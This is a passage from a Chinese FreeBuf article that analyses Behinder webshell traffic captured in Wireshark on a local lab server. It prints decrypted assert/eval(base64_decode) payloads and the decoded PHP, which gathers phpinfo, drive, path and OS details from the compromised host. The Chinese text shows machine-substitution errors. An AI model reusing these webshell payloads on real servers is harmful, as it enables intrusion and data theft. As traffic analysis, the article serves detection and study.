2、将此文件放入被攻击做事器网站下,然后运行冰蝎客户端,新建连接
3、利用wireshark抓取冰蝎流量包
(1)由于我的冰蝎客户端与被攻击做事器在同一台电脑上,因此wireshark的网卡应选择如下:
(2)开始捕获后,点击新建的连接进入webshell管理界面
(3)在wireshark中即可捕获到冰蝎客户端与做事器通信的数据包
(4)追踪HTTP流即可看到冰蝎客户端与做事器的完全通信过程
4、剖析冰蝎与做事器的通信过程
(1)当冰蝎第一次访问做事器webshell时,以GET办法提交随机数字,因此做事器将会天生16位的随机字符串,写入session后通过print函数将密钥返回客户端;
(2)冰蝎第二次访问做事器时以相同办法更新密钥;
(3)经由一次密钥产生与一次密钥更新后,双方开始以对称密钥进行加密通信,首先是冰蝎向做事器发送加密数据,而解密函数在webshell中:
我们通过解密办法解密要求包数据:
因此得到冰蝎发送的要求包实际载荷为:
assert|eval(base64_decode('QGVycmyX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIG1haW4oJGNvbnRlbnQpDQp7DQoJJHJlc3VsdCA9IGFycmF5KCk7DQoJJHJlc3VsdFsic3RhdHVzIl0gPSBiYXNlNjRfZW5jb2RlKCJzdWNjZXNzIik7DQogICAgJHJlc3VsdFsibXNnIl0gPSBiYXNlNjRfZW5jb2RlKCRjb250ZW50KTsNCiAgICAka2V5ID0gJF9TRVNTSU9OWydrJ107DQogICAgZWNobyBlbmNyeXB0KGpzb25fZW5jb2RlKCRyZXN1bHQpLCRrZXkpOw0KfQ0KDQpmdW5jdGlvbiBlbmNyeXB0KCRkYXRhLCRrZXkpDQp7DQoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkNCiAgICAJew0KICAgIAkJZmyKCRpPTA7JGk8c3RybGVuKCRkYXRhKTskaSsrKSB7DQogICAgCQkJICRkYXRhWyRpXSA9ICRkYXRhWyRpXV4ka2V5WyRpKzEmMTVdOyANCiAgICAJCQl9DQoJCQlyZXR1cm4gJGRhdGE7DQogICAgCX0NCiAgICBlbHNlDQogICAgCXsNCiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsNCiAgICAJfQ0KfSRjb250ZW50PSI1NzE3OGJkNS03YzJhLTRjNTgtYTZlOC01NmUyYTJjZjYyMjMiOw0KbWFpbigkY29udGVudCk7'));
个中base64解码数据为:
@error_reporting(0);function main($content){$result = array();$result["status"] = base64_encode("success");$result["msg"] = base64_encode($content);$key = $_SESSION['k'];echo encrypt(json_encode($result),$key);}function encrypt($data,$key){ if(!extension_loaded('openssl')){ for($i=0;$i $data[$i] = $data[$i]^$key[$i+1&15]; return $data;}else{ return openssl_encrypt($data, "AES128", $key);}}$content="57178bd5-7c2a-4c58-a6e8-56e2a2cf6223";main($content);
以上base64解码便是冰蝎的实际攻击代码;
梳理一下本次数据的处理过程:
【1】冰蝎将AES加密数据发送至做事器webshell;
【2】webshell检测到没有以GET办法提交的pass参数的值,因此调用openssl扩展,结合冰蝎发送的数据和session中的密钥进行AES解密,得到解密后的载荷assert|eval(base64_decode('QGVy......;
【3】以|为分隔符,将解密后的载荷分隔为两部分,将实行载荷的过程放入自定义类C的魔术函数__construct()中;
【4】实例化自定义类,触发__construct()函数,实行eval(base64_decode('QGVy......;
【5】实行时,首先进行base64解码,然后实行解码后的代码,代码中定义了result数组,result数组有两个键值对:
'status':base64_encode("success")
'msg':base64_encode("57178bd5-7c2a-4c58-a6e8-56e2a2cf6223")
【6】然后从session中取得密钥,对result数组加密,将加密结果输出到客户端;
(4)冰蝎收到加密数据后,在内部进行解密(解密代码与解密的过程在冰蝎内部完成,我们看不到)
但是我们可以自行解密,查看做事器发送至冰蝎的真实数据:
因此得到做事器发送的相应包实际数据为:
{"status":"c3VjY2Vzcw==","msg":"NTcxNzhiZDUtN2MyYS00YzU4LWE2ZTgtNTZlMmEyY2Y2MjIz"}
经由base64解码后的结果为:
{"status":"success","msg":"57178bd5-7c2a-4c58-a6e8-56e2a2cf6223"}
和我们在(3)梳理的代码实行流程吻合;
紧接着上面的数据包进行剖析:
(5)冰蝎客户端收到{"status":"success","msg":"57178bd5-7c2a-4c58-a6e8-56e2a2cf6223"}后,再次发送加密数据至做事器webshell,解密数据查看:
即冰蝎发送的要求包实际载荷为:
assert|eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KZnVuY3Rpb24gbWFpbigpIHsNCiAgICBvYl9zdGFydCgpOyBwaHBpbmZvKCk7ICRpbmZvID0gb2JfZ2V0X2NvbnRlbnRzKCk7IG9iX2VuZF9jbGVhbigpOw0KICAgICRkcml2ZUxpc3QgPSIiOw0KICAgIGlmIChzdHJpc3RyKFBIUF9PUywid2luZG93cyIpfHxzdHJpc3RyKFBIUF9PUywid2lubnQiKSkNCiAgICB7DQogICAgICAgIGZvcigkaT02NTskaTw9OTA7JGkrKykNCiAgICAJew0KICAgIAkJJGRyaXZlPWNocigkaSkuJzovJzsNCiAgICAJCWZpbGVfZXhpc3RzKCRkcml2ZSkgPyAkZHJpdmVMaXN0PSRkcml2ZUxpc3QuJGRyaXZlLiI7IjonJzsNCiAgICAJfQ0KICAgIH0NCgllbHNlDQoJew0KCQkkZHJpdmVMaXN0PSIvIjsNCgl9DQogICAgJGN1cnJlbnRQYXRoPWdldGN3ZCgpOw0KICAgIC8vZWNobyAicGhwaW5mbz0iLiRpbmZvLiJcbiIuImN1cnJlbnRQYXRoPSIuJGN1cnJlbnRQYXRoLiJcbiIuImRyaXZlTGlzdD0iLiRkcml2ZUxpc3Q7DQogICAgJG9zSW5mbz1QSFBfT1M7DQogICAgJHJlc3VsdD1hcnJheSgiYmFzaWNJbmZvIj0+YmFzZTY0X2VuY29kZSgkaW5mbyksImRyaXZlTGlzdCI9PmJhc2U2NF9lbmNvZGUoJGRyaXZlTGlzdCksImN1cnJlbnRQYXRoIj0+YmFzZTY0X2VuY29kZSgkY3VycmVudFBhdGgpLCJvc0luZm8iPT5iYXNlNjRfZW5jb2RlKCRvc0luZm8pKTsNCiAgICAvL2VjaG8ganNvbl9lbmNvZGUoJHJlc3VsdCk7DQogICAgc2Vzc2lvbl9zdGFydCgpOw0KICAgICRrZXk9JF9TRVNTSU9OWydrJ107DQogICAgLy9lY2hvIGpzb25fZW5jb2RlKCRyZXN1bHQpOw0KICAgIC8vZWNobyBvcGVuc3NsX2VuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICJBRVMxMjgiLCAka2V5KTsNCiAgICBlY2hvIGVuY3J5cHQoanNvbl9lbmNvZGUoJHJlc3VsdCksICRrZXkpOw0KfQ0KDQpmdW5jdGlvbiBlbmNyeXB0KCRkYXRhLCRrZXkpDQp7DQoJaWYoIWV4dGVuc2lvbl9sb2FkZWQoJ29wZW5zc2wnKSkNCiAgICAJew0KICAgIAkJZmyKCRpPTA7JGk8c3RybGVuKCRkYXRhKTskaSsrKSB7DQogICAgCQkJICRkYXRhWyRpXSA9ICRkYXRhWyRpXV4ka2V5WyRpKzEmMTVdOyANCiAgICAJCQl9DQoJCQlyZXR1cm4gJGRhdGE7DQogICAgCX0NCiAgICBlbHNlDQogICAgCXsNCiAgICAJCXJldHVybiBvcGVuc3NsX2VuY3J5cHQoJGRhdGEsICJBRVMxMjgiLCAka2V5KTsNCiAgICAJfQ0KfQ0KbWFpbigpOw=='));
base64解码数据为(中文注释为自己剖析后加上):
error_reporting(0);function main(){ ob_start();//打开输出缓冲区,所有来自PHP程序的非文件头信息均不会发送,而是保存在内部缓冲区phpinfo();//输出phpinfo信息到缓冲区$info = ob_get_contents();//将phpinfo信息存储到$info变量ob_end_clean();//打消内部缓冲区内容,并且关闭内部缓冲区 $driveList =""; if(stristr(PHP_OS,"windows")||stristr(PHP_OS,"winnt"))//如果做事器操作系统为windows或winnt { for($i=65;$i<=90;$i++) {$drive=chr($i).':/'; file_exists($drive) ? $driveList=$driveList.$drive.";":'';//获取做事器的所有盘符,形如"C:/;D:/;" } }else//如果做事器操作系统不是windows或winnt{$driveList="/";//则获取根目录} $currentPath=getcwd();//获取当前路径 //echo "phpinfo=".$info."\n"."currentPath=".$currentPath."\n"."driveList=".$driveList; $osInfo=PHP_OS;//获取当前操作系统 $result=array("basicInfo"=>base64_encode($info),"driveList"=>base64_encode($driveList),"currentPath"=>base64_encode($currentPath),"osInfo"=>base64_encode($osInfo)); //echo json_encode($result); session_start();//创建新会话或者重用现有会话;如果通过GET/POST/cookie提交了会话ID,则会重用现有会话;此函数用于php文件共享一个会话内定义的变量 $key=$_SESSION['k'];//得到本会话中存储于session中的AES密钥 //echo json_encode($result); //echo openssl_encrypt(json_encode($result), "AES128", $key); echo encrypt(json_encode($result), $key);//做事器输出AES加密后的数据(包括phpinfo信息,盘符信息,当前路径,操作系统)供冰蝎吸收}function encrypt($data,$key){if(!extension_loaded('openssl')){for($i=0;$i<strlen($data);$i++){$data[$i] = $data[$i]^$key[$i+1&15]; }return $data;} else{return openssl_encrypt($data, "AES128", $key);}}main();
(6)由上面冰蝎发送的实行代码可知,做事器发送回的相应数据是经由AES加密后的以数组形式保存的phpinfo信息、盘符信息、当前路径、操作系统信息的base64编码,我们解密相应包数据验证一下:
即做事器发送的相应包的实际载荷为:
{"basicInfo":"PCFET0......jwvaHRtbD4=","driveList":"QzovO0Q6Lzs=","currentPath":"QzpcVG9vbHNcUmFuZ2VzXHBocHN0dWR5X3Byb1xXV1dcdGVzdA==","osInfo":"V0lOTlQ="}
base64解码数据为:
{ "basicInfo":phpinfo信息, "driveList":"C:/;D:/;", "currentPath":"C:\Tools\Ranges\phpstudy_pro\WWW\test", "osInfo":"WINNT" }
参考链接:
https://blog.csdn.net/agathakuan/article/details/121018071(利用wireshark抓本地包)
https://www.bbsmax.com/A/kPzO9LA35x/(记一次解密wireshark抓取的冰蝎通信流量)
https://blog.csdn.net/He0an39n/article/details/125520962(Misc_冰蝎流量剖析)
https://blog.csdn.net/weixin_39190897/article/details/109417674(渗透测试-流量加密之冰蝎&蚁剑)
https://www.anquanke.com/post/id/212271(冰蝎,从入门到魔改)
申明:本文仅供技能互换,请自觉遵守网络安全干系法律法规,切勿利用文章内的干系技能从事造孽活动,如因此产生的统统不良后果与文章作者无关 。 本文作者:sixthdimension, 原创来自FreeBuf.COM
